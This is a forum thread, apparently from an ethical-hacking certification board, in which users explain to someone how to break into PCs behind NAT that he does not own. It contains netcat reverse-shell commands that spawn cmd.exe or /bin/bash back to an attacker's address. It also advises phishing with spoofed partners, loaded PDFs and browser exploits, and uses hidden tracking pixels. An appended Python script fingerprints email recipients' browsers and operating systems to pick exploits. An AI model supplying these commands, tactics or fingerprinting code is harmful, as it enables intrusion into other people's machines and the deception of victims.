how to penetrate pc through NAT ??

<<

rebrov

Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Thu Apr 22, 2010 3:54 pm

how to penetrate pc through NAT ??

I'll suppose I have 4 PCs in my network and of course I'm using the NAT protocol to translate all my 4 addresses to 1 public IP.

Well, the question is: is there any chance to penetrate my network through NAT?

And how do you do it?
<<

kriscamaro68

Jr. Member

Posts: 61

Joined: Thu Mar 11, 2010 2:48 pm

Post Thu Apr 22, 2010 4:00 pm

Re: how to penetrate pc through NAT ??

rebrov wrote:I'll suppose I have 4 PCs in my network and of course I'm using the NAT protocol to translate all my 4 addresses to 1 public IP.

Well, the question is: is there any chance to penetrate my network through NAT?

And how do you do it?


I would think it would be possible through a social engineering attack of sorts, by sending the user an e-mail which they click that installs some sort of software, or maybe has a link to a site that infects the computer. Other than that I wouldn't know, because I am still too new at this stuff. Maybe someone else could shed some more light on it.
A+, Net+, Server+, Security+, MCP/XP
<<

n1p

Jr. Member

Posts: 89

Joined: Tue Mar 16, 2010 5:31 pm

Post Thu Apr 22, 2010 4:54 pm

Re: how to penetrate pc through NAT ??

Yes, you may need to initiate a connection from the internal network/PCs. However, NAT routers may also have running services that can be exploited (remote administration/ftp). They may also forward ports to services on the client PC that may be exploited.
<<

j0rDy

Hero Member

Posts: 591

Joined: Tue Feb 23, 2010 4:55 am

Location: Netherlands

Post Fri Apr 23, 2010 2:19 am

Re: how to penetrate pc through NAT ??

Attacks through a NAT are always done through a reverse connection, because of the fact that you cannot connect directly to the machine in the network, like n1p said. If there are ports forwarded, the attacker can connect to them directly...
CISSP, CEH, ECSA, OSCP, OSWP

earning my stripes appears to be a road i must travel alone...with a little help of EH.net
<<

caissyd

Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Fri Apr 23, 2010 6:41 am

Re: how to penetrate pc through NAT ??

To add to what j0rDy mentioned, your system could also get compromised by surfing to malicious web sites (cross-site scripting).
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

unsupported

Sr. Member

Posts: 318

Joined: Sun Feb 08, 2009 3:38 pm

Location: 407

Post Fri Apr 23, 2010 7:48 am

Re: how to penetrate pc through NAT ??

For your scenario, you can shovel a shell/reverse shell using NetCat.  How do you get NetCat on the machine from the outside?  It is so small it can fit inside a buffer overflow or you can combine it with another executable which is run on the inside.
-Un
CISSP, GCIH, GCIA, C|EH, Sec+, Net+, MCP
<<

rebrov

Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Thu May 13, 2010 8:19 pm

Re: how to penetrate pc through NAT ??

Yes, that's right, the only way is to use reverse telnet or a reverse trojan... a connect-back trojan, is that right?

But how do I use a reverse telnet connection to the target, in case I can deliver netcat to the target?
<<

Xen

Sr. Member

Posts: 386

Joined: Tue Feb 03, 2009 3:59 am

Post Thu May 13, 2010 10:03 pm

Re: how to penetrate pc through NAT ??

After you install netcat on the target machine you can create a reverse shell on the target machine that will connect to you.
Firstly, you must have a netcat listener running on your machine.
  Code:
Command:
nc -l -p <port you want netcat to listen on>


Then you make a reverse shell from the target machine connect to you.
  Code:
For Windows target:
nc <your IP address> <your open port> -e cmd.exe


  Code:
For Linux target:
nc <your IP address> <your open port> -e /bin/bash
Last edited by Xen on Thu May 13, 2010 10:05 pm, edited 1 time in total.
<<

rebrov

Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Thu May 13, 2010 11:22 pm

Re: how to penetrate pc through NAT ??

Equix3n- wrote:After you install netcat on the target machine you can create a reverse shell on the target machine that will connect to you.
Firstly, you must have a netcat listener running on your machine.
  Code:
Command:
nc -l -p <port you want netcat to listen on>


Then you make a reverse shell from the target machine connect to you.
  Code:
For Windows target:
nc <your IP address> <your open port> -e cmd.exe


  Code:
For Linux target:
nc <your IP address> <your open port> -e /bin/bash


That's working only when you have physical access to the 2 machines, right?

And also I think you have to use some kind of no-ip service if the 2 machines are behind NAT, right?

But what if you don't have physical access to the machine? It's penetrating, not negotiating with 2 machines you own, you get what I mean?
<<

Xen

Sr. Member

Posts: 386

Joined: Tue Feb 03, 2009 3:59 am

Post Fri May 14, 2010 1:47 am

Re: how to penetrate pc through NAT ??

You don't have to have physical access to these machines to launch a reverse shell. You can try for client-side exploits and get the shell. It's all done remotely.
<<

rebrov

Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Sat May 15, 2010 5:34 am

Re: how to penetrate pc through NAT ??

Equix3n- wrote:You don't have to have physical access to these machines to launch a reverse shell. You can try for client-side exploits and get the shell. It's all done remotely.


Exploits? What do you mean? I can't exploit it yet because it's NATted!

How can I exploit it if it's NATted in the first place?
<<

hayabusa

Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Sat May 15, 2010 7:08 am

Re: how to penetrate pc through NAT ??

@rebrov -

To exploit a machine behind NAT, you will have to get the remote user to access a malicious webpage, send an email that deceives them into opening a malicious attachment, or otherwise find a way to manipulate the remote user into executing code to create your reverse shell or otherwise give you access. That's why they said "You can try for client side exploits..." You need to find some vulnerability on the client machine that either auto-executes malicious code, or tricks the user into running it, so you can gain access. Aside from those, unless you gain physical access to a machine behind the NAT and run code yourself, there won't be a way to exploit the clients behind NAT, as you cannot directly connect to them from outside without a reverse shell.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

Xen

Sr. Member

Posts: 386

Joined: Tue Feb 03, 2009 3:59 am

Post Sat May 15, 2010 8:36 am

Re: how to penetrate pc through NAT ??

The goal of client-side exploits is to make the victim initiate an outbound connection to you. Here we try to exploit the applications installed on the victim's computer. The only drawback of this method is that you have to rely on the victim to access your machines or run your code. Furthermore, you have to guess what software the victim might be running.
You have a server that serves exploits to the client machines connecting to it. You send a script/URL to the victim which makes the appropriate client machine connect to the attacker's server. The server then exploits the client connecting to it.
For example, suppose you know that a user is not very security conscious. He rarely updates his system and is probably still using IE6. You send him a fake email which contains a link/script to your server that serves an appropriate IE6 exploit. When the user clicks on your URL and visits your server, his browser is exploited to spawn a reverse shell to you.

As a side note, it will be good for you if you try to learn some things by yourself too. I had already told you that client-side exploits are the way to go here. You could have googled for client-side exploits, which would have given you more detailed articles. Learning from a forum is only beneficial if you make some effort from your side too. No one will spoon-feed you; you can only be given pointers. I do not mean to discourage you from asking questions, you'll be helped in the future also, but I want you to learn some things yourself too.

Edit: I didn't mean to be rude. It's just that English isn't my primary language, so I may not have expressed my emotions clearly.
Last edited by Xen on Sat May 15, 2010 12:38 pm, edited 1 time in total.
<<

rebrov

Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Sat May 15, 2010 12:37 pm

Re: how to penetrate pc through NAT ??

Equix3n- wrote:The goal of client-side exploits is to make the victim initiate an outbound connection to you. Here we try to exploit the applications installed on the victim's computer. The only drawback of this method is that you have to rely on the victim to access your machines or run your code. Furthermore, you have to guess what software the victim might be running.
You have a server that serves exploits to the client machines connecting to it. You send a script/URL to the victim which makes the appropriate client machine connect to the attacker's server. The server then exploits the client connecting to it.
For example, suppose you know that a user is not very security conscious. He rarely updates his system and is probably still using IE6. You send him a fake email which contains a link/script to your server that serves an appropriate IE6 exploit. When the user clicks on your URL and visits your server, his browser is exploited to spawn a reverse shell to you.

As a side note, it will be good for you if you try to learn some things by yourself too. I had already told you that client-side exploits are the way to go here. You could have googled for client-side exploits, which would have given you more detailed articles. Learning from a forum is only beneficial if you make some effort from your side too. No one will spoon-feed you; you can only be given pointers. I do not mean to discourage you from asking questions, you'll be helped in the future also, but I want you to learn some things yourself too.


No no, you were so gentle, guys, and helpful. From my side I will try to search more and learn more about client-side; I'll tell you what I'm going to get later. Thanks guys for the information :)
<<

sil

Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Sat May 15, 2010 12:58 pm

Re: how to penetrate pc through NAT ??

rebrov wrote:No no, you were so gentle, guys, and helpful. From my side I will try to search more and learn more about client-side; I'll tell you what I'm going to get later. Thanks guys for the information :)



Take a different approach here in understanding this from a non-technological perspective. This allows you to understand the concept more...

Technological approach
Client
Server

Non-tech approach
Client - someone paying you for something
Vendor (server) - someone offering a service

On the non-tech side, you as a vendor are providing, say, water. You'd like your client to buy (run software) water (exploit). How would you get the client to try your tasty water? Offer it to them for free. People like free.

Tech approach
Enumerate - either technically or socially - any potential services you think your client is running. Familiarize yourself somehow with his internals. Send them an email with an embedded picture:


  Code:
<img src="http://mysite.com/nonexistentimage.jpg" height="0" width="0">


What does this do for you? If you're running your own webserver, you could check your logs to see the user agent of his browser. Say you see the following:

  Code:
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"


You now know whoever opened that email is using IE 6.0 to surf the Internet. How do you cause your client (that machine) to open something innocuous and run code? Search for something that could potentially affect his browser. The client would run code and open a shell to you given the right parameters.

Client side: What could that person be running inside their network? If I send them a loaded PDF, would I get a shell? If I sent them a heap-spraying IE exploit targeted at IE 6.0, would I be able to come OUT from them TO wherever I need them to connect to?

Can I social engineer them to open a loaded file for me? Enumerate THEIR clients and business partners. Send them a loaded PDF spoofing one of their clients, business partners, co-workers. Get them to open up something you've created to exploit the client side. The key is to get them to run something. Could be a variety of things, use your imagination. What would get YOU TO OPEN a file or check a website?
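The hidden-image trick sil describes only pays off once you pull the hits back out of the web server log, and it is also the practical answer to Xen's point a few posts up that you have to guess what software the victim runs. Here is an added example, my code rather than anything from the thread, that does that over a few constructed combined-format log lines: the hostnames, RFC 5737 test addresses and timestamps are made up, the pixel path is sil's, and the r= query token is my addition so that sending each recipient a slightly different URL tells you who opened the mail, not just that someone did. The Windows NT version table is the standard mapping. One caveat: most mail clients now block remote images by default, so no hit does not mean nobody read it.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample of Apache/nginx "combined" access-log lines, not real traffic:
# two hits on the tracking pixel (one carrying a per-recipient token) and two
# unrelated requests that the parser must ignore.
SAMPLE_LOG = """\
203.0.113.7 - - [15/May/2010:12:58:01 +0000] "GET /nonexistentimage.jpg HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
203.0.113.7 - - [15/May/2010:12:58:02 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
198.51.100.23 - - [15/May/2010:13:02:11 +0000] "GET /nonexistentimage.jpg?r=partner7 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
192.0.2.44 - - [15/May/2010:13:05:40 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "curl/7.19.7"
"""

# One combined-format line: ip ident user [ts] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Windows NT kernel version as reported in the UA string -> marketing name.
WINDOWS_NT = {
    "5.0": "Windows 2000",
    "5.1": "Windows XP",
    "5.2": "Windows Server 2003",
    "6.0": "Windows Vista",
    "6.1": "Windows 7",
}


def classify_ua(ua):
    """Return the browser family and version worth searching exploits for."""
    m = re.search(r"MSIE (\d+\.\d+)", ua)
    if m:
        return "Internet Explorer " + m.group(1)
    m = re.search(r"Firefox/(\d+\.\d+)", ua)
    if m:
        return "Firefox " + m.group(1)
    return "unknown"


def os_from_ua(ua):
    """Map the 'Windows NT x.y' token to an OS name; anything else is unknown."""
    m = re.search(r"Windows NT (\d+\.\d+)", ua)
    if m:
        return WINDOWS_NT.get(m.group(1), "Windows NT " + m.group(1))
    return "unknown"


def pixel_hits(log_text, pixel_path="/nonexistentimage.jpg"):
    """Pick out requests for the tracking pixel and fingerprint each client.
    The query string is split off before comparing paths so a per-recipient
    token (?r=...) still matches; the token is reported back."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a line in the expected format
        url = urlsplit(m.group("path"))
        if url.path != pixel_path:
            continue                      # some other request, not the pixel
        ua = m.group("ua")
        token = parse_qs(url.query).get("r", [None])[0]
        hits.append({
            "ip": m.group("ip"),
            "when": m.group("ts"),
            "token": token,               # who the mail was addressed to, if tagged
            "browser": classify_ua(ua),
            "os": os_from_ua(ua),
            "ua": ua,
        })
    return hits


if __name__ == "__main__":
    for h in pixel_hits(SAMPLE_LOG):
        who = h["token"] or "untagged"
        print(f'{h["when"]}  {h["ip"]:<15} {who:<10} {h["browser"]} on {h["os"]}')
```

The 404 on the pixel is expected: the image never existed, the log entry is the only thing you wanted. Feed the function your real access log instead of SAMPLE_LOG and the output is the list of recipients who rendered the mail, with the browser and OS each one did it from.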
Return to CEH - Certified Ethical Hacker
